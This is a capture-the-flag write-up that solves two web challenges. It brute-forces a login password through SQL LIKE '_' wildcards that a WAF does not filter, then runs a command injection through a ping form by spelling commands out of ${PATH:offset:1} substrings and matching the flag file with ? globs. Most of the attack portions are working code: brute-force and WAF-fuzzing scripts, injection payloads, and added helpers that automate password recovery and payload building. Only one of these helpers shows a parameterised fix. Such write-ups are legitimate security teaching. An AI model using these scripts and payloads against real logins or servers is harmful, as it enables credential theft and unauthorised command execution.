莫负婵娟

Testing showed that % is caught by the WAF, but _ still gets through, so _ can be used to brute-force the password length: in a SQL LIKE pattern, _ matches exactly one character, so a password of n underscores only matches a stored password of exactly n characters.

import requests

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}

# Send 0..49 underscores as the password; only the probe whose length equals
# the real password length satisfies the LIKE comparison.
for i in range(50):
    exp = '_' * i
    payload = {'username': 'yu22x', 'password': exp}
    response = requests.post(url, headers=headers, data=payload)
    # Anything other than the failure message means the pattern matched.
    if 'wrong username or password' not in response.text:
        print(i)
        print(response.text.encode('utf-8'))

Result:

32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'

So the password is 32 characters long. The next script recovers it one position at a time: the known prefix, one candidate character, and enough underscores to pad the pattern back to 32 characters.

import requests
import string

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}
charset = string.digits + string.ascii_letters
password = ''

# Fix one character per round. The '_' padding keeps the pattern exactly
# 32 characters long, so a match confirms only the candidate at position i.
for i in range(32):
    for j in charset:
        exp = '_' * (32 - i - 1)
        payload = {'username': 'yu22x', 'password': password + j + exp}
        response = requests.post(url, headers=headers, data=payload)
        if 'wrong username or password' not in response.text:
            password += j
            break

print(password)

Recovered password:

67815b0c009ee970fe4014abaa3Fa6A0
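The two scripts above need a live target. The following is an added example (not code from the original writeup) that reproduces the whole LIKE-wildcard attack offline against an in-memory SQLite table standing in for the challenge's database. It is an assumption that the target built its query the way vulnerable_login does; the recovered password from the page is reused only as the mock's stored value. The example also shows two things the writeup does not: a case-insensitive LIKE collation silently lowercases the recovered password (the mixed-case result on the page therefore implies the target compared case-sensitively), and a parameterised equality check gives the length probe nothing to match.

```python
import sqlite3
import string

# Mock credentials: the username and the recovered password from the writeup,
# stored in a constructed SQLite table that stands in for the target's DB.
USER = "yu22x"
SECRET = "67815b0c009ee970fe4014abaa3Fa6A0"


def make_db(case_sensitive_like=True):
    """In-memory users table; the PRAGMA controls SQLite's LIKE collation."""
    con = sqlite3.connect(":memory:")
    con.execute(f"PRAGMA case_sensitive_like = {'ON' if case_sensitive_like else 'OFF'}")
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", (USER, SECRET))
    return con


def vulnerable_login(con, username, password):
    """Assumed shape of the target's query: string-built, compared with LIKE,
    so '_' and '%' in the submitted password act as wildcards."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND password LIKE '{password}'"
    return con.execute(sql).fetchone() is not None


def hardened_login(con, username, password):
    """Fixed version: bound parameters and an equality test, so the input is
    data and never pattern syntax."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def waf(password):
    """Mimic the challenge filter: '%' is rejected, '_' passes."""
    return "%" not in password


def find_length(oracle, max_len=64):
    """Probe '_' * n for n = 1..max_len; the matching n is the password length."""
    for n in range(1, max_len + 1):
        probe = "_" * n
        if waf(probe) and oracle(probe):
            return n
    return None


def recover(oracle, length, charset=string.digits + string.ascii_letters):
    """Position-by-position recovery: known prefix + candidate + '_' padding."""
    known = ""
    for pos in range(length):
        for c in charset:
            probe = known + c + "_" * (length - pos - 1)
            if waf(probe) and oracle(probe):
                known += c
                break
        else:
            return None  # no candidate matched: charset incomplete or oracle unreliable
    return known


def attack(login, con):
    """Run length discovery, then character recovery, through the given login."""
    oracle = lambda p: login(con, USER, p)
    n = find_length(oracle)
    return n, (recover(oracle, n) if n else None)


if __name__ == "__main__":
    print(attack(vulnerable_login, make_db()))       # exact password recovered
    print(attack(vulnerable_login, make_db(False)))  # case-insensitive LIKE: case is lost
    print(attack(hardened_login, make_db()))         # (None, None): no probe ever matches
```

The oracle here is the boolean the login returns; against the real target it is the absence of the "wrong username or password" string, which is why any unexpected page (a WAF block, a 500) would be misread as a hit and should be checked separately.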

After logging in there is an internal network test platform. The first guess was SSRF, but attempts at directory traversal hit the WAF. The following script fuzzes every printable character through the ip parameter to learn which ones the filter lets through (remember to update the cookies):

import string
import requests

url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"
headers = {
    'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
}

# Submit each printable character on its own as the ip parameter. The WAF
# answers with a page containing 'evil' when it blocks the character, so
# everything that does not trigger that response is written to fuzz.txt.
with open('fuzz.txt', 'w') as f:
    for i in string.printable:
        payload = {'ip': i}
        response = requests.post(url, headers=headers, data=payload)
        if 'evil' not in response.text:
            f.write(i)

Characters that passed the filter, as written to fuzz.txt (note the trailing space):

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ 

Every lowercase letter is filtered, and Linux command names are case-sensitive, so ls cannot be typed directly. What does get through is enough for bash substring expansion: $, {, }, : and digits, plus ; to chain a second command after the ping target. ${PATH:offset:1} cuts a single character out of the PATH variable, so any command whose letters occur in PATH can be spelled out of it.

Cutting out single characters: ${PATH:offset:1} returns the character at the given offset.

Iterating: submit ${PATH:i:1} for increasing i and compare the responses to learn which character sits at each position of the target's PATH (the offsets below are specific to that value).

With the offsets known, ls becomes:

127.0.0.1;${PATH:5:1}${PATH:2:1}

The listing shows the flag file.

Read it with cat or nl, both spelled out of PATH the same way. The file name cannot be typed either, but ? and . are allowed, so the glob ????.??? stands in for flag.php (four characters, a dot, three characters); either of the following works:

127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???
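The following added example (not code from the original writeup) automates the last step: given the allowed character set from the fuzz run and a PATH value, it spells a command out of ${PATH:offset:1} expansions, replaces the file name with a ? glob, checks the finished payload against the filter, and evaluates the expansions offline so the result can be verified without a target. The PATH value is an assumption (the Debian default); the writeup's ${PATH:92:1} for the letter t shows the target's PATH was longer than that, which is exactly why the offsets have to be enumerated on the target first.

```python
import re

# Characters the fuzz run on the page found to pass the filter (including space).
ALLOWED = set("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ ")

# Assumed shell PATH (Debian default, 60 characters). Offsets depend entirely on
# this value, so against a real target it must be recovered by iteration first.
DEFAULT_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed variant with an extra directory, so that 't' (absent from the
# default PATH) becomes available at offset 64.
LONG_PATH = DEFAULT_PATH + ":/opt/bin"


def char_from_path(ch, path=DEFAULT_PATH):
    """Spell one character as the bash substring expansion ${PATH:offset:1}."""
    idx = path.find(ch)
    if idx < 0:
        raise ValueError(f"{ch!r} does not occur in PATH; choose another command")
    return f"${{PATH:{idx}:1}}"


def spell(word, path=DEFAULT_PATH):
    """Spell a whole command name out of PATH substrings."""
    return "".join(char_from_path(c, path) for c in word)


def glob_for(filename):
    """Replace every character except '.' with '?', e.g. flag.php -> ????.???"""
    return "".join("." if c == "." else "?" for c in filename)


def passes_filter(payload):
    """True if every character of the payload survived the fuzz run."""
    return set(payload) <= ALLOWED


def build_payload(ip, command, target=None, path=DEFAULT_PATH):
    """Assemble '<ip>;<command> <glob>' and refuse anything the WAF would block."""
    payload = f"{ip};{spell(command, path)}"
    if target is not None:
        payload += " " + glob_for(target)
    if not passes_filter(payload):
        raise ValueError(f"filtered characters: {sorted(set(payload) - ALLOWED)}")
    return payload


def expand(payload, path=DEFAULT_PATH):
    """Evaluate ${PATH:offset:1} the way bash does (empty past the end) to check
    what the target's shell will actually run."""
    return re.sub(r"\$\{PATH:(\d+):1\}",
                  lambda m: path[int(m.group(1)):int(m.group(1)) + 1], payload)


if __name__ == "__main__":
    ls = build_payload("127.0.0.1", "ls")
    print(ls, "->", expand(ls))
    nl = build_payload("127.0.0.1", "nl", "flag.php")
    print(nl, "->", expand(nl))
    try:
        spell("cat")
    except ValueError as e:
        print("default PATH:", e)
    cat = build_payload("127.0.0.1", "cat", "flag.php", LONG_PATH)
    print(cat, "->", expand(cat, LONG_PATH))
```

With the default PATH the builder reproduces the writeup's ls and nl payloads exactly (l at offset 5, s at 2, n at 14) and refuses cat, because no t exists in that string; supplying a PATH that contains one is enough to make cat available, which mirrors what the iteration step discovered on the target.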
